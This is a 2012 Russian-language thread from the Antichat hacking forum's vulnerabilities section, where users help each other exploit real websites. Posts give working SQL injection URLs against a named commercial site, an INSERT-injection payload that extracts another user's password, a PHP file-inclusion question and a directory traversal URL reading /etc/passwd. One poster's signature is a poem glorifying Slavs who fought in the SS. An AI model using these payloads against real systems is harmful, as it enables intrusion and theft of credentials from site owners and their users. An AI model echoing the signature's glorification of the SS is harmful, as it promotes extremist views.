HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.09.2012, 23:20
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

http://www.cellapplications.com/product_desc.php?id=-1919'+union+select+1,2,3,4,5,6+--+

как быть?
 
Ответить с цитированием

  #2  
Старый 12.09.2012, 23:39
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

Цитата:
Сообщение от OxoTnik  
как вариант 5.1.49-1ubuntu8
Пробелы убрать
ну, что можно раскрутить как слепую, я знаю

а если как обычную, ни как?
 
Ответить с цитированием

  #3  
Старый 13.09.2012, 00:21
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

Цитата:
Сообщение от OxoTnik  
Нука поподробнее расскажи :ebak:
я имел ввиду через ерор базед

опечатался, с кем не бывает)

меня больше интересует, раскрутить как обычную...
 
Ответить с цитированием

  #4  
Старый 13.09.2012, 07:08
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от smirk  
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...
Не сочти за трололо - но "как обычную" - это как ??

Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?

Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?

В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?

З.Ы. для люителей шаблонно мыслить

Код:
_ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version),1,1)='5
 
Ответить с цитированием

  #5  
Старый 13.09.2012, 21:56
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]
$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/[\x80-\xFF]/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\r"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\0"[/COLOR][COLOR="#007700"]), array([/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Show'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ucwords[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'Page'[/COLOR][COLOR="#007700"];

if(![/
COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {

exit([/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#FF8000"]// Added Autoload in feature Versions

[/COLOR][COLOR="#007700"]require([/COLOR][COLOR="#DD0000"]'test/class.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pageClass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
П.с волнует вопрос если можно обрезать то что идёт ДО переменной
 
Ответить с цитированием

  #6  
Старый 14.09.2012, 13:31
Basters
Новичок
Регистрация: 23.02.2011
Сообщений: 2
С нами: 8008886

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
INSERT INTO table1 (user_from,
user_to,message
,edittime) VALUES('10',
'10','mess'
,'1347608937')
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
 
Ответить с цитированием

  #7  
Старый 14.09.2012, 15:57
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Basters  
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
а какой ты результат хочешь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #8  
Старый 15.09.2012, 01:49
Basters
Новичок
Регистрация: 23.02.2011
Сообщений: 2
С нами: 8008886

Репутация: 0
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
а какой ты результат хочешь?
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
 
Ответить с цитированием

  #9  
Старый 15.09.2012, 08:28
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от Basters  
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
http://www.mysql.ru/docs/man/SELECT.html

INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')
 
Ответить с цитированием

  #10  
Старый 15.09.2012, 16:43
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Здравствуйте нашел Directory Traversal

http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.